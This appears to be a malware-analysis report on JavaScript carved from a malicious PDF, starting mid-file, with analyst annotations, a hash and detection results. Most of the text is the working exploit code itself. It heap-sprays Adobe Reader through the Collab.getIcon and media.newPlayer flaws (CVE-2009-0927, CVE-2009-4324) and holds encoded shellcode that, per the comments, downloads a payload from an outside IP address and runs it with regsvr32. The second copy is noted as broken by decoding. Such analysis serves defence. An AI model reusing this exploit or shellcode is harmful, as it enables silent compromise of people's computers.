function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}
// Collab.getIcon branch (the CVE-2009-0927 heuristic above): _1o prefixed with a run of 0x9090 NOP words is
// sprayed as 180 blocks of roughly 0x40000 chars; Collab.getIcon() is then called with a 4012-element array of
// "\n\n\n\n" strings plus '_N.bundle' — Array + string coerces to one comma-joined argument of ~20,000 chars.
function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('%0a%0a%0a%0a');}Collab.getIcon(_2o4+'_N.bundle');}
// Dispatch on the version number: 8000<=v<=8102 or 8950<v<9050 -> _1o3 (getIcon). The else-if test
// (v>=9100)||(v<=9200)||(v>=8103)||(v<=8107) is true for every numeric v, so every other version takes the
// newPlayer path; only a NaN (unparseable version) would skip both branches.
var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}
generic_stage_recovery_001.js | deobfuscated-js | generic stage recovery (percent-decode) from JavaScript object 76 at offset 0x38A | 4461 bytes — the same stage as generic_stage_recovery_000.js reached via a different transform; the percent-decode pass also expanded the `%0a%0a%0a%0a` literal inside the script into four raw newline bytes (hence the 8-byte size difference), so this preview is not syntactically valid JavaScript as shown — use _000 for analysis.
SHA-256: b3b358b9c0dfecc3651dc21c0ede49b5a7ee0c81edb733754e0efc941e56fe80
Detection
ClamAV: No threats found (a negative signature result on a carved stage does not lower the verdict above, which rests on the classifier and the CVE heuristics matched in this recovered code)
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
// Same stage as generic_stage_recovery_000.js, reached through the percent-decode transform. The code is the
// sample's own (line breaks added only between top-level statements); the comments are analyst annotations.
// NOTE(review): the transform also decoded the '%0a%0a%0a%0a' literal inside _1o3 into four raw newline bytes,
// so that string literal is unterminated and this text is not valid JavaScript as shown — analyse the _000 copy.
//
// _1o / _2o: shellcode stored as %uXXXX escapes (little-endian 16-bit words). Read that way, the tail of _1o is
// ".../d7.php?f=g" and the tail of _2o is ".../d8.php?f=n" — the two Embedded URL entries above — and both
// blobs carry bytes that read as "urlmon" and "regsvr32 -s ". Static reading only; not confirmed by execution.
var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E37%u6870%u3F70%u3D66%u0067%u0000';
var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u392F%u2E31%u3232%u2E38%u3331%u2E33%u3635%u642F%u736E%u7466%u7372%u2F6E%u6361%u3631%u6261%u6632%u6666%u6436%u3466%u6132%u6337%u3234%u3062%u3438%u3933%u3631%u3361%u3463%u642F%u2E38%u6870%u3F70%u3D66%u006E%u0000';
// Reader version probe: app.viewerVersion as a string, first '.' removed, right-padded with '0' to four digits,
// parsed base 10 (e.g. "9.3" -> 9300). Only the first '.' is replaced.
function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}
// media.newPlayer branch (CVE-2009-4324 heuristic): 12,000 heap blocks of 0x8000 chars each (0x9090 sled + _2o),
// util.printd() twice before and once after this.media.newPlayer(null); the empty catch swallows any exception.
function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}
// Collab.getIcon branch (CVE-2009-0927 heuristic): NOP-prefixed _1o sprayed as 180 blocks of roughly 0x40000
// chars, then Collab.getIcon() with a 4012-element array (coerced to a ~20,000-char comma-joined string)
// plus '_N.bundle'. The unescape('…') literal below is the one broken by the percent-decode pass.
function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape('



');}Collab.getIcon(_2o4+'_N.bundle');}
// Dispatch: 8000<=v<=8102 or 8950<v<9050 -> _1o3 (getIcon); the else-if test is true for every numeric v,
// so every other version takes the newPlayer path (only NaN skips both).
var _4o=_3o();if(((_4o>8950)&&(_4o<9050))||((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)||(_4o<=9200)||(_4o>=8103)||(_4o<=8107)){_5o();}